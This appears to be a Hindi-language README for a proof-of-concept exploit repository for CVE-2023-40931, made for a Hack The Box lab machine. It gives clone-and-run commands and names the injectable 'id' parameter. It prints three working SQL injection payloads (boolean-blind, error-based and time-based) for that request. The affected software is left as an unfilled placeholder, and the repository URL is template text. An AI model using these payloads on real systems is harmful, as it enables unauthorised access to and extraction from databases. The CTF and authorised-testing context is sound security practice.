
CVE-2023-40931 Proof of Concept HTB MONITORED के लिए बनाया गया
यह रिपॉजिटरी CVE-2023-40931 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) है, जो [प्रभावित सॉफ्टवेयर/सिस्टम] में पहचानी गई एक सुरक्षा भेद्यता है। इस रिपॉजिटरी का उद्देश्य केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए भेद्यता का प्रदर्शन करना है। 🛠️
यह परियोजना केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए है। इस कोड के दुरुपयोग से कानूनी परिणाम हो सकते हैं। लेखक इस कोड के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें। 🔒
अधिक जानकारी के लिए, आधिकारिक CVE प्रविष्टि देखें: CVE-2023-40931. 🔗
रिपॉजिटरी क्लोन करें:
git clone https://github.com/yourusername/CVE-2023-40931-POC.git
cd CVE-2023-40931-POC
python3 exploit.py
POST पैरामीटर 'id' असुरक्षित है। निम्नलिखित पेलोड ने भेद्यता का सफलतापूर्वक शोषण किया:
बूलियन-आधारित ब्लाइंड: यह पेलोड एक क्वेरी के सत्य मान को निर्धारित करने के लिए एक सशर्त कथन का उपयोग करता है, जिससे बूलियन तर्क के माध्यम से डेटा निष्कर्षण की अनुमति मिलती है।
action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))त्रुटि-आधारित: यह पेलोड विशिष्ट त्रुटियों को ट्रिगर करके जानकारी निकालने के लिए डेटाबेस त्रुटि संदेशों का शोषण करता है।
action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)समय-आधारित ब्लाइंड: यह पेलोड सर्वर की प्रतिक्रिया समय का अवलोकन करके जानकारी का अनुमान लगाने के लिए समय विलंब का उपयोग करता है।
action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)ये पेलोड SQL इंजेक्शन हमलों के प्रति भेद्यता की संवेदनशीलता को प्रदर्शित करते हैं। सावधानी से आगे बढ़ें और परीक्षण से पहले उचित प्राधिकरण सुनिश्चित करें। 🔒
PoC को निष्पादित करने के लिए exploit.py फ़ाइल में दिए गए निर्देशों का पालन करें। 🧑💻
नोट: सुनिश्चित करें कि आपके पास आवश्यक निर्भरताएँ स्थापित हैं। ✅